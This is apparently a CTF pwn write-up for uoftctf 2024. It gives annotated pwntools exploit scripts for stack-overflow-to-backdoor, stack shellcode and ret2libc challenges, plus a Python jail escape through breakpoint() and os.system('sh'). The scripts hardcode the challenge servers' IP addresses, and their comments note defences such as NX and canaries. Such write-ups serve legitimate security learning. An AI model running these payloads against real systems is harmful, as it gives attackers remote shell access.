nyyyddddn

uoftctf_pwn_wp

2024/01/18

pwn

basic-overflow

有一个 shell 函数，栈溢出覆盖返回地址为 shell 的地址即可

// IDA decompilation of main() from basic-overflow. The argv/envp passed to
// gets() are decompiler artifacts: the real gets() takes only the buffer.
int __cdecl main(int argc, const char **argv, const char **envp)
{
char v4[64]; // [rsp+0h] [rbp-40h] BYREF

// gets() has no length check, so input longer than 64 bytes runs past v4,
// over the saved rbp and into the return address (classic stack overflow).
// Fix: fgets(v4, sizeof v4, stdin) or an explicitly bounded read().
gets(v4, argv, envp);
return 0;
}
// Backdoor function: main() never calls it, but it is linked into the
// binary, so its address becomes the overflow's return target. Unused
// privileged helpers like this should be stripped from release builds.
int shell()
{
return execve("/bin/sh", 0LL, 0LL); // argv and envp both NULL
}

exp

# uoftctf "basic-overflow": main() fills a 64-byte stack buffer with gets(),
# so the saved return address can be overwritten with the address of the
# binary's own shell() function.
# Defender's note: a bounded read, stack canaries and PIE would each break
# this payload; the unbounded gets() is the root cause.
from pwn import *
from LibcSearcher import *  # not used by this script; left from the template

# 64-bit Linux target; 'debug' echoes every byte sent and received.
context(os='linux',arch='amd64',log_level='debug')
elf = context.binary = ELF('./basic-overflow')
libc = elf.libc  # not used by this script

# 0 = connect to the remote CTF service, non-zero = run the local binary.
is_debug = 0

if(is_debug):
    p = process()
else:
    ip = "34.123.15.202"
    port = 5000
    p = remote(ip,port)

# gdb.attach(p)
g = lambda x: gdb.attach(x)

# send() sendline() sendafter() sendlineafter()
# Short aliases from the author's template; only sl() is used below.
s = lambda x: p.send(x)
sl = lambda x: p.sendline(x)
sa = lambda x,y: p.sendafter(x,y)
sla = lambda x,y: p.sendlineafter(x,y)

# recv() recvline() recvuntil()
r = lambda x = None: p.recv() if x is None else p.recv(x)
rl = lambda : p.recvline()
ru = lambda x: p.recvuntil(x)

# "leek" is the author's spelling of "leak": read up to the 0x7f (64-bit) or
# 0xf7 (32-bit) high byte of a libc pointer and unpack it. Unused here.
r_leek_libc_64 = lambda : u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
r_leek_libc_32 = lambda : u32(p.recvuntil(b'\xf7')[-4:])


# 0x40 bytes fill v4 (char v4[64] at rbp-0x40), 0x8 more cover the saved rbp,
# then the return address is replaced by 0x401136 — the author's address of
# shell(); the fixed value implies the binary is presumably non-PIE.
payload = b'a' * (0x40 + 0x8) + p64(0x401136)

sl(payload)

p.interactive()

baby-shellcode

emm没有输入大小是 0x400,直接用shellcraft吧

; IDA listing of baby-shellcode's entry point: read up to 0x400 bytes from
; stdin onto the stack, then jump to them. Whatever is sent is executed as
; code, which presumably relies on the stack being executable (NX off);
; an NX stack would turn the jmp into a fault.
public _start
_start proc near
sub rsp, 400h ; reserve 0x400 bytes of stack as the input buffer
mov edx, 400h ; count
mov rsi, rsp ; buf
mov edi, 0 ; fd (stdin)
mov eax, 0 ; syscall number 0 = read
syscall ; LINUX - sys_read
jmp rsp ; execute the bytes just read
_start endp

_text ends
# uoftctf "baby-shellcode": the program reads 0x400 bytes onto the stack and
# jumps to them, so the input itself is executed. The payload is pwntools'
# generated /bin/sh shellcode.
# Defender's note: an executable stack is the enabling condition; NX/W^X
# makes this class of bug unexploitable as written.
from pwn import *
from LibcSearcher import *  # not used by this script; left from the template

# 64-bit Linux target; 'debug' echoes every byte sent and received.
context(os='linux',arch='amd64',log_level='debug')
elf = context.binary = ELF('./baby-shellcode')
libc = elf.libc  # not used by this script

# 0 = connect to the remote CTF service, non-zero = run the local binary.
is_debug = 0

if(is_debug):
    p = process()
else:
    ip = "34.28.147.7"
    port = 5000
    p = remote(ip,port)

# gdb.attach(p)
g = lambda x: gdb.attach(x)

# send() sendline() sendafter() sendlineafter()
# Short aliases from the author's template; only sl() is used below.
s = lambda x: p.send(x)
sl = lambda x: p.sendline(x)
sa = lambda x,y: p.sendafter(x,y)
sla = lambda x,y: p.sendlineafter(x,y)

# recv() recvline() recvuntil()
r = lambda x = None: p.recv() if x is None else p.recv(x)
rl = lambda : p.recvline()
ru = lambda x: p.recvuntil(x)

# "leek" is the author's spelling of "leak": read up to the 0x7f (64-bit) or
# 0xf7 (32-bit) high byte of a libc pointer and unpack it. Unused here.
r_leek_libc_64 = lambda : u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
r_leek_libc_32 = lambda : u32(p.recvuntil(b'\xf7')[-4:])


# shellcraft.sh() emits amd64 shellcode for the configured context; asm()
# assembles it to the raw bytes the program will jump into.
payload = asm(shellcraft.sh())

sl(payload)
p.interactive()

patched-shell

和第一题 basic-overflow 一样，有一个 backdoor 函数

# uoftctf "patched-shell": same bug as basic-overflow (unbounded read into a
# stack buffer) with a backdoor function in the binary; only the return
# target differs.
# Defender's note: a bounded read, stack canaries and PIE would each break
# this payload.
from pwn import *
from LibcSearcher import *  # not used by this script; left from the template

# 64-bit Linux target; 'debug' echoes every byte sent and received.
context(os='linux',arch='amd64',log_level='debug')
elf = context.binary = ELF('./patched-shell')
libc = elf.libc  # not used by this script

# 0 = connect to the remote CTF service, non-zero = run the local binary.
is_debug = 0

if(is_debug):
    p = process()
else:
    ip = "34.134.173.142"
    port = 5000
    p = remote(ip,port)

# gdb.attach(p)
g = lambda x: gdb.attach(x)

# send() sendline() sendafter() sendlineafter()
# Short aliases from the author's template; only sl() is used below.
s = lambda x: p.send(x)
sl = lambda x: p.sendline(x)
sa = lambda x,y: p.sendafter(x,y)
sla = lambda x,y: p.sendlineafter(x,y)

# recv() recvline() recvuntil()
r = lambda x = None: p.recv() if x is None else p.recv(x)
rl = lambda : p.recvline()
ru = lambda x: p.recvuntil(x)

# "leek" is the author's spelling of "leak": read up to the 0x7f (64-bit) or
# 0xf7 (32-bit) high byte of a libc pointer and unpack it. Unused here.
r_leek_libc_64 = lambda : u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
r_leek_libc_32 = lambda : u32(p.recvuntil(b'\xf7')[-4:])


# Same layout as basic-overflow: 0x40 bytes of buffer + 0x8 of saved rbp, then
# the return address. 0x401137 is the author's target in this binary; it is
# one byte past the basic-overflow value, presumably to skip the backdoor's
# first instruction (e.g. for stack alignment) — confirm in the disassembly.
payload = b'a' * (0x40 + 0x8) + p64(0x401137)

sl(payload)


p.interactive()

nothing-to-return

binary 里面没有 useful gadget，那可以去 libc 里面找嘛；题目直接给了 printf 的地址，不需要再 leak printf 了

# uoftctf "nothing-to-return": the binary has no usable gadgets, but it prints
# printf's address, which gives the libc base; the ROP chain is then built
# entirely from libc (pop rdi; "/bin/sh"; system).
# Defender's note: printing a libc address defeats ASLR on its own; combined
# with the unbounded input this is a full ret2libc. Never expose pointers to
# users, and bound the read.
from pwn import *
from LibcSearcher import *  # not used by this script; left from the template

# 64-bit Linux target; 'debug' echoes every byte sent and received.
context(os='linux',arch='amd64',log_level='debug')
elf = context.binary = ELF('./nothing-to-return')
libc = elf.libc  # libc matched to the binary; used for symbol offsets below

# 0 = connect to the remote CTF service, non-zero = run the local binary.
is_debug = 0

if(is_debug):
    p = process()
else:
    ip = "34.30.126.104"
    port = 5000
    p = remote(ip,port)

# gdb.attach(p)
g = lambda x: gdb.attach(x)

# send() sendline() sendafter() sendlineafter()
# Short aliases from the author's template; ru(), rl() and sla() are used below.
s = lambda x: p.send(x)
sl = lambda x: p.sendline(x)
sa = lambda x,y: p.sendafter(x,y)
sla = lambda x,y: p.sendlineafter(x,y)

# recv() recvline() recvuntil()
r = lambda x = None: p.recv() if x is None else p.recv(x)
rl = lambda : p.recvline()
ru = lambda x: p.recvuntil(x)

# "leek" is the author's spelling of "leak": read up to the 0x7f (64-bit) or
# 0xf7 (32-bit) high byte of a libc pointer and unpack it. Unused here.
r_leek_libc_64 = lambda : u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
r_leek_libc_32 = lambda : u32(p.recvuntil(b'\xf7')[-4:])


# The service prints "printf is at <hex>": parse the line (dropping the
# trailing newline) and subtract printf's offset to recover the libc base.
ru("printf is at ")
printf_addr = int(rl()[:-1],16)
libc_base = printf_addr - libc.sym['printf']
success(f"libc_base ->{hex(libc_base)}")

# 0x28265 is the author's libc offset of the gadget that loads rdi (the name
# suggests `pop rdi; ret`); it is specific to the challenge libc — verify
# against the libc in use. system and "/bin/sh" come from libc symbols/search.
rdi = libc_base + 0x0000000000028265
system = libc_base + libc.sym['system']
binsh = libc_base + next(libc.search(b'/bin/sh'))
# `ret` gadget in the binary itself (fixed address); presumably inserted to
# keep the stack 16-byte aligned before calling system — confirm in gdb.
ret = 0x000000000040101a


# 0x40 + 0x8 bytes of padding, then: ret -> pop rdi (rdi = "/bin/sh") -> system.
payload = flat([
b'a' * (0x40 + 0x8),
ret,rdi,binsh,system
])

print(len(payload))

# The service asks for the input length first, then the input itself.
sla("Hello give me an input",str(len(payload)))
sla("Enter your input:\n",payload)

p.interactive()

jail

Baby’s First Pyjail

lhj@lhj-virtual-machine:~/Desktop/uoftctf/pwn/nothing-to-return$  nc 35.226.249.45 5000
>>> __import__('os').system('sh')
try harder
>>> breakpoint()
--Return--
> <string>(1)<module>()->None
(Pdb) __import__('os').system('sh')
ls
chal.py
flag
cat flag